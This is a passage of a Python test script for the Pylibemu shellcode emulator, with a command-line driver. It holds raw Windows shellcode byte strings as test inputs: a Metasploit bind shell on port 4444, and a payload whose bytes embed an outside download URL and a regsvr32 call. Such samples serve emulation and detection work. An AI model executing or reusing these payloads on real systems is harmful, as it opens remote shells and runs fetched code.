b"\x75\x08\x53\x68\xe5\x49\x86\x49\xff\xd6\xff\xd0\x8b\x4d\x08\x89" # |u.Sh.I.I.....M..| 1522 | shellcode += b"\x45\x08\x51\xff\x55\x18\x81\xc4\xfc\xfe\xff\xff\x8b\xdc\x33\xc9" # |E.Q.U.........3.| 1523 | shellcode += b"\x51\xb1\xff\x51\x53\xff\x75\x08\xff\x55\x10\x85\xc0\x7e\x0a\x50" # |Q..QS.u..U...~.P| 1524 | shellcode += b"\x53\xff\x75\x04\xff\x55\x0c\xeb\xe5\xff\x75\x08\xff\x55\x18\x57" # |S.u..U....u..U.W| 1525 | shellcode += b"\x68\x5b\x4c\x1a\xdd\xff\xd6\xff\x75\x04\xff\xd0\x33\xc0\x50\xff" # |h[L.....u...3.P.| 1526 | shellcode += b"\x75\x14\x57\x68\x98\xfe\x8a\x0e\xff\xd6\xff\xd0\x57\x68\xef\xce" # |u.Wh........Wh..| 1527 | shellcode += b"\xe0\x60\xff\xd6\xff\xd0\x65\x65\x65\x65" # |.`....eeee| 1528 | 1529 | self.runShellcode(shellcode, 27) 1530 | 1531 | def testShellcode28(self): 1532 | """ 1533 | windows/shell_bind_tcp AutoRunScript=, EXITFUNC=process, InitialAutoRunScript=, 1534 | LPORT=4444, RHOST= http://www.metasploit.com 1535 | """ 1536 | 1537 | shellcode = b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" 1538 | shellcode += b"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" 1539 | shellcode += b"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" 1540 | shellcode += b"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" 1541 | shellcode += b"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" 1542 | shellcode += b"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" 1543 | shellcode += b"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" 1544 | shellcode += b"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" 1545 | shellcode += b"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" 1546 | shellcode += b"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" 1547 | shellcode += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" 1548 | shellcode += b"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" 1549 | shellcode += b"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7" 1550 | shellcode += b"\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" 1551 | shellcode += b"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" 1552 | shellcode += b"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75" 1553 | shellcode += b"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" 1554 | shellcode += b"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01" 1555 | shellcode += b"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" 1556 | shellcode += b"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" 1557 | shellcode += b"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56" 1558 | shellcode += b"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" 1559 | shellcode += b"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" 1560 | 1561 | self.runShellcode(shellcode, 28) 1562 | 1563 | def testShellcode29(self): 1564 | 1565 | shellcode = b'\x90\x90\x90\x90\x90\x90\x90\x90\xe9\x36\x01\x00\x00\x5f\x64\xa1\x30\x00' 1566 | shellcode += b'\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x20\x80\x7d\x0c\x33\x74\x03' 1567 | shellcode += b'\x96\xeb\xf3\x8b\x68\x08\x8b\xf7\x6a\x05\x59\xe8\xca\x00\x00\x00\xe2\xf9' 1568 | shellcode += b'\xe8\x00\x00\x00\x00\x58\x50\x6a\x40\x68\xff\x00\x00\x00\x50\x83\xc0\x19' 1569 | shellcode += b'\x50\x55\x8b\xec\x8b\x5e\x10\x83\xc3\x05\xff\xe3\x68\x6f\x6e\x00\x00\x68' 1570 | shellcode += b'\x75\x72\x6c\x6d\x54\xff\x16\x8b\xe8\xe8\x96\x00\x00\x00\x8b\xd7\x47\x80' 1571 | shellcode += b'\x3f\x00\x75\xfa\x47\x57\x47\x80\x3f\x00\x75\xfa\x8b\xef\x5f\x33\xc9\x81' 1572 | shellcode += b'\xec\x10\x01\x00\x00\x8b\xdc\x83\xc3\x0c\x51\x52\x53\x68\x04\x01\x00\x00' 1573 | shellcode += b'\xff\x56\x0c\x5a\x59\x51\x52\x8b\x02\x53\x43\x80\x3b\x00\x75\xfa\x81\x7b' 1574 | shellcode += b'\xfc\x2e\x64\x6c\x6c\x75\x03\x83\xeb\x08\x89\x03\xc7\x43\x04\x2e\x64\x6c' 1575 | shellcode += b'\x6c\xc6\x43\x08\x00\x5b\x8a\xc1\x04\x30\x88\x45\x00\x33\xc0\x50\x50\x53' 1576 | shellcode += b'\x57\x50\xff\x56\x14\x83\xf8\x00\x75\x1d\x6a\x01\x83\xeb\x0c\xc7\x03\x72' 1577 | shellcode += b'\x65\x67\x73\xc7\x43\x04\x76\x72\x33\x32\xc7\x43\x08\x20\x2d\x73\x20\x53' 1578 | shellcode += b'\xff\x56\x04\x5a\x59\x83\xc2\x04\x41\x80\x3a\x00\x90\x90\x90\x75\x9a\xff' 1579 | shellcode += b'\x56\x08\x51\x56\x8b\x75\x3c\x8b\x74\x35\x78\x03\xf5\x56\x8b\x76\x20\x03' 1580 | shellcode += b'\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe\x10\x38\xf2\x74\x08\xc1' 1581 | shellcode += b'\xcb\x0d\x03\xda\x40\xeb\xf1\x3b\x1f\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66' 1582 | shellcode += b'\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8' 1583 | shellcode += b'\xc5\xfe\xff\xff\x8e\x4e\x0e\xec\x98\xfe\x8a\x0e\x7e\xd8\xe2\x73\x33\xca' 1584 | shellcode += b'\x8a\x5b\x1b\xc6\x46\x79\x36\x1a\x2f\x70\x63\x71\x4d\x46\x00\x68\x74\x74' 1585 | shellcode += b'\x70\x3a\x2f\x2f\x6b\x69\x61\x6a\x6d\x6b\x6a\x6b\x79\x74\x6e\x2e\x63\x6f' 1586 | shellcode += b'\x6d\x2f\x6e\x74\x65\x2f\x67\x6e\x68\x31\x31\x2e\x70\x79\x2f\x79\x48\x35' 1587 | shellcode += b'\x33\x32\x36\x38\x36\x62\x39\x56\x30\x31\x30\x30\x66\x30\x36\x30\x30\x30' 1588 | shellcode += b'\x36\x52\x33\x64\x37\x30\x38\x66\x62\x31\x31\x30\x32\x54\x31\x65\x37\x61' 1589 | shellcode += b'\x37\x66\x32\x31\x32\x30\x33\x6c\x30\x30\x30\x63\x33\x32\x39\x00\x00' 1590 | 1591 | self.runShellcode(shellcode, 29) 1592 | 1593 | 1594 | def usage(): 1595 | sys.stdout.write(""" 1596 | Pylibemu test suite 1597 | 1598 | Usage: 1599 | python sctest.py [ options ] 1600 | 1601 | Options: 1602 | -h , --help Display this help information. 1603 | -s , --shellcode= Execute the selected shellcode test (0 means 'all tests') 1604 | -i , --info= Shows information about the selected shellcode test 1605 | 1606 | """) 1607 | sys.exit(0) 1608 | 1609 | if __name__ == '__main__': 1610 | args = sys.argv[1:] 1611 | try: 1612 | options, args = getopt.getopt(args, 'hs:i:', 1613 | ['help', 'shellcode=', 'info=', ]) 1614 | except getopt.GetoptError: 1615 | usage() 1616 | 1617 | if not options and not args: 1618 | usage() 1619 | 1620 | sctest = ShellcodeTest() 1621 | execute = False 1622 | info = False 1623 | 1624 | for option in options: 1625 | if option[0] == '-h' or option[0] == '--help': 1626 | usage() 1627 | if option[0] == '-s' or option[0] == '--shellcode': 1628 | f = getattr(sctest, "testShellcode%i" % (int(option[1]), ), None) 1629 | execute = True 1630 | if option[0] == '-i' or option[0] == '--info': 1631 | if int(option[1]) == 0: 1632 | usage() 1633 | f = getattr(sctest, "testShellcode%i" % (int(option[1]), ), None) 1634 | info = True 1635 | 1636 | if info: 1637 | sys.stdout.write(f.__doc__ + '\n') 1638 | if execute: 1639 | f() 1640 | --------------------------------------------------------------------------------